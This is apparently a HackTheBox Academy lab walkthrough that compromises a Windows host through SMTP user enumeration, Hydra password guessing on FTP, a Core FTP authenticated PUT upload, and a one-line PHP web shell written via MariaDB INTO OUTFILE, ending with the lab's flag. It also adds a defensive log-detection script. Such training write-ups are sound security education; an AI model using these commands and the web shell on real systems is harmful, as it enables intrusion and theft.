Attacking Common Services - Easy
ℹ️ Information
- 🌐 Website: HackTheBox
- 📚 Module: Attacking Common Services
- 🔗 Link: Attacking Common Services - Easy
❓ Question
You are targeting the inlanefreight.htb domain. Assess the target server and obtain the contents of the flag.txt file. Submit it as the answer.
📋 Walkthrough
First, add inlanefreight.htb to /etc/hosts, then run an nmap scan to identify open ports and services.
┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV $target
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-20 18:27 UTC
Nmap scan report for 10.129.203.7
Host is up (0.026s latency).
Not shown: 993 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp
|_ssl-date: 2025-03-20T17:28:16+00:00; -1h00m04s from scanner time.
| ssl-cert: Subject: commonName=Test/organizationName=Testing/stateOrProvinceName=FL/countryName=US
| Not valid before: 2022-04-21T19:27:17
|_Not valid after: 2032-04-18T19:27:17
| fingerprint-strings:
| GenericLines:
| 220 Core FTP Server Version 2.0, build 725, 64-bit Unregistered
| Command unknown, not supported or not allowed...
| Command unknown, not supported or not allowed...
| Help:
| 220 Core FTP Server Version 2.0, build 725, 64-bit Unregistered
| 214-The following commands are implemented
| USER PASS ACCT QUIT PORT RETR
| STOR DELE RNFR PWD CWD CDUP
| NOOP TYPE MODE STRU
| LIST NLST HELP FEAT UTF8 PASV
| MDTM REST PBSZ PROT OPTS CCC
| XCRC SIZE MFMT CLNT ABORT
| HELP command successful
| NULL:
|_ 220 Core FTP Server Version 2.0, build 725, 64-bit Unregistered
25/tcp open smtp hMailServer smtpd
| smtp-commands: WIN-EASY, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp open http Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/7.4.29)
|_http-server-header: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
| http-title: Welcome to XAMPP
|_Requested resource was http://10.129.203.7/dashboard/
443/tcp open ssl/https
|_ssl-date: 2025-03-20T17:28:15+00:00; -1h00m04s from scanner time.
|_http-server-header: Core FTP HTTPS Server
| ssl-cert: Subject: commonName=Test/organizationName=Testing/stateOrProvinceName=FL/countryName=US
| Not valid before: 2022-04-21T19:27:17
|_Not valid after: 2032-04-18T19:27:17
587/tcp open smtp hMailServer smtpd
| smtp-commands: WIN-EASY, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
3306/tcp open mysql MariaDB 5.5.5-10.4.24
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.4.24-MariaDB
| Thread ID: 11
| Capabilities flags: 63486
| Some Capabilities: ConnectWithDatabase, SupportsLoadDataLocal, Support41Auth, LongColumnFlag, IgnoreSpaceBeforeParenthesis, Speaks41ProtocolOld, Speaks41ProtocolNew, InteractiveClient, SupportsTransactions, DontAllowDatabaseTableColumn, FoundRows, SupportsCompression, IgnoreSigpipes, ODBCClient, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
| Status: Autocommit
| Salt: BxW,s"L7oI]yj(${bXrV
|_ Auth Plugin Name: mysql_native_password
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=WIN-EASY
| Not valid before: 2025-03-19T17:21:05
|_Not valid after: 2025-09-18T17:21:05
|_ssl-date: 2025-03-20T17:28:15+00:00; -1h00m04s from scanner time.
| rdp-ntlm-info:
| Target_Name: WIN-EASY
| NetBIOS_Domain_Name: WIN-EASY
| NetBIOS_Computer_Name: WIN-EASY
| DNS_Domain_Name: WIN-EASY
| DNS_Computer_Name: WIN-EASY
| Product_Version: 10.0.17763
|_ System_Time: 2025-03-20T17:28:07+00:00
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: Host: WIN-EASY; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -1h00m03s, deviation: 0s, median: -1h00m04s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 67.77 seconds
FTP Enumeration
Start with FTP. Check for anonymous login.
┌──(kali㉿kali)-[~]
└─$ ftp $target
Connected to 10.129.203.7.
220 Core FTP Server Version 2.0, build 725, 64-bit Unregistered
Name (10.129.203.7:kali): anonymous
331 password required for anonymous
Password:
500 PASS: command not understood
ftp: Login failed
ftp>
SMTP Enumeration
Enumerate users with smtp-user-enum in RCPT mode, using the inlanefreight.htb domain.
┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ smtp-user-enum -M RCPT -U users.list -t $target -D inlanefreight.htb
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Mode ..................... RCPT
Worker Processes ......... 5
Usernames file ........... users.list
Target count ............. 1
Username count ........... 79
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............ inlanefreight.htb
######## Scan started at Thu Mar 20 18:47:26 2025 #########
10.129.24.232: fiona@inlanefreight.htb exists
######## Scan completed at Thu Mar 20 18:47:28 2025 #########
1 results.
79 queries in 2 seconds (39.5 queries / sec)
We found the user fiona@inlanefreight.htb. Let's try a dictionary attack.
Dictionary Attack
Attempt to crack the password using Hydra.
┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ hydra -l "fiona@inlanefreight.htb" -P passwords.list -f inlanefreight.htb pop3
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-20 18:48:33
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 16 tasks per 1 server, overall 16 tasks, 250 login tries (l:1/p:250), ~16 tries per task
[DATA] attacking pop3://inlanefreight.htb:110/
Hydra did not work on POP3. Let's try guessing the FTP password for the user fiona.
┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ hydra -l "fiona" -P /usr/share/wordlists/rockyou.txt -f ftp://$target
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-20 19:17:48
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ftp://10.129.134.126:21/
[STATUS] 64.00 tries/min, 64 tries in 00:01h, 14344351 to do in 3735:31h, 1 active
[21][ftp] host: 10.129.134.126 login: fiona password: 987654321
[STATUS] attack finished for 10.129.134.126 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-03-20 19:19:05
We found the credentials fiona:987654321.
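As an added example (not part of the original walkthrough), the Python script below shows how a defender would spot both probes above in server logs: the RCPT-mode user enumeration against SMTP, where the only accepted recipient inside a burst of 550 rejections is the valid mailbox, and the Hydra password guessing against FTP, where a 230 follows a run of 530 failures. The log format and source addresses are constructed for the example; real hMailServer and Core FTP logs need their own parsing.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample log (not from the target), normalised to
# "<date> <time> <service> <source-ip> <user-or-recipient> <reply-code>".
SAMPLE_LOG = """\
2025-03-20 18:47:26 smtp 10.10.14.5 alice@inlanefreight.htb 550
2025-03-20 18:47:26 smtp 10.10.14.5 bob@inlanefreight.htb 550
2025-03-20 18:47:27 smtp 10.10.14.5 carol@inlanefreight.htb 550
2025-03-20 18:47:27 smtp 10.10.14.5 fiona@inlanefreight.htb 250
2025-03-20 18:47:28 smtp 10.10.14.5 dave@inlanefreight.htb 550
2025-03-20 19:17:49 ftp 10.10.14.5 fiona 530
2025-03-20 19:17:50 ftp 10.10.14.5 fiona 530
2025-03-20 19:17:51 ftp 10.10.14.5 fiona 530
2025-03-20 19:17:52 ftp 10.10.14.5 fiona 230
2025-03-20 19:20:00 smtp 10.10.14.9 fiona@inlanefreight.htb 250
"""

LINE_RE = re.compile(r"^(\S+ \S+) (smtp|ftp) (\S+) (\S+) (\d{3})$")
FAIL = {"smtp": "550", "ftp": "530"}  # unknown recipient / login incorrect
OK = {"smtp": "250", "ftp": "230"}    # recipient accepted / login succeeded

def parse(text):
    """Yield (timestamp, service, src_ip, name, code); malformed lines are skipped."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield (datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S"), *m.groups()[1:])

def detect(events, window_s=60, threshold=3):
    """Flag each (service, src_ip) with >= threshold failures inside window_s seconds;
    'valid' lists the names that source later got accepted (mailbox or account)."""
    by_src = defaultdict(list)
    for ev in events:
        by_src[(ev[1], ev[2])].append(ev)
    alerts = {}
    for (service, ip), evs in by_src.items():
        fails = [e for e in evs if e[4] == FAIL[service]]
        for i, first in enumerate(fails):
            burst = [e for e in fails[i:] if (e[0] - first[0]).total_seconds() <= window_s]
            if len(burst) < threshold:
                continue
            valid = sorted({e[3] for e in evs if e[4] == OK[service] and e[0] >= first[0]})
            alerts[(service, ip)] = {"failures": len(burst),
                                     "names_tried": len({e[3] for e in burst}),
                                     "valid": valid}
            break
    return alerts
```

A high names_tried count with few failures per name points at enumeration; many failures against one name followed by an accepted login points at password guessing that succeeded.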
FTP Access
Login to FTP using the found credentials.
┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ ftp $target
Connected to 10.129.134.126.
220 Core FTP Server Version 2.0, build 725, 64-bit Unregistered
Name (10.129.134.126:kali): fiona
331 password required for fiona
Password:
230-Logged on
230
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||43655|)
ls
The extended passive mode data connection hangs, so disable passive mode and list the files again.
ftp> passive
Passive mode: off; fallback to active mode: off.
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection
-r-xr-xrwx 1 owner group 55 Apr 21 2022 docs.txt
-r-xr-xrwx 1 owner group 255 Apr 22 2022 WebServersInfo.txt
226 Transfer Complete
ftp>
File Analysis
Download and analyze the files.
┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ cat docs.txt
I'm testing the FTP using HTTPS, everything looks good.
┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ cat WebServersInfo.txt
CoreFTP:
Directory C:\CoreFTP
Ports: 21 & 443
Test Command: curl -k -H "Host: localhost" --basic -u <username>:<password> https://localhost/docs.txt
Apache
Directory "C:\xampp\htdocs\"
Ports: 80 & 4443
Test Command: curl http://localhost/test.php
Exploiting CoreFTP
Core FTP is known to have vulnerabilities, and its HTTPS server on port 443 accepts an authenticated HTTP PUT, so files can be written with the credentials we found. Confirm this by overwriting docs.txt with a proof-of-concept string, then read it back.
┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ curl -k -X PUT -H "Host: $target" --basic -u fiona:987654321 --data-binary "PoC." --path-as-is https://$target/docs.txt
┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ curl -k -H "Host: $target" --basic -u fiona:987654321 https://$target/docs.txt
PoC.
Uploading Web Shell
Upload a web shell using curl.
┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ curl -k -X PUT -H "Host: $target" --basic -u fiona:987654321 --data-binary @shell.php --path-as-is https://$target/shell.php
HTTP/1.1 200 Ok
Date:Thu, 20 Feb 2025 18:31:29 GMT
Server: Core FTP HTTP Server
Accept-Ranges: bytes
Connection: Keep-Alive
Content-type: application/octet-stream
Content-length: 5490
SQL Injection
If the above method fails, the same credentials also log into the MariaDB service on port 3306, where INTO OUTFILE can write a file into the XAMPP web root.
┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ mysql -h $target -u fiona -p987654321 --ssl=FALSE
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 11
Server version: 10.4.24-MariaDB mariadb.org binary distribution
Write a minimal PHP web shell into the Apache web root (C:\xampp\htdocs, as listed in WebServersInfo.txt) with INTO OUTFILE.
MariaDB [(none)]> SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE 'C:\\xampp\\htdocs\\test2.php';
Query OK, 1 row affected (0.027 sec)
Accessing the Web Shell
Access the web shell and retrieve the flag.
http://inlanefreight.htb/test2.php?c=dir%20C:\Users\Administrator\Desktop
 Volume in drive C has no label.
 Volume Serial Number is B8B3-0D72

 Directory of C:\Users\Administrator\Desktop

04/22/2022  10:40 AM    <DIR>          .
04/22/2022  10:40 AM    <DIR>          ..
04/22/2022  10:36 AM                39 flag.txt
               1 File(s)             39 bytes
               2 Dir(s)  15,629,279,232 bytes free
http://inlanefreight.htb/test2.php?c=type%20C:\Users\Administrator\Desktop\flag.txt
HTB{t#3r3_4r3_tw0_w4y$_t0_93t_t#3_fl49}
Answer
HTB{t#3r3_4r3_tw0_w4y$_t0_93t_t#3_fl49}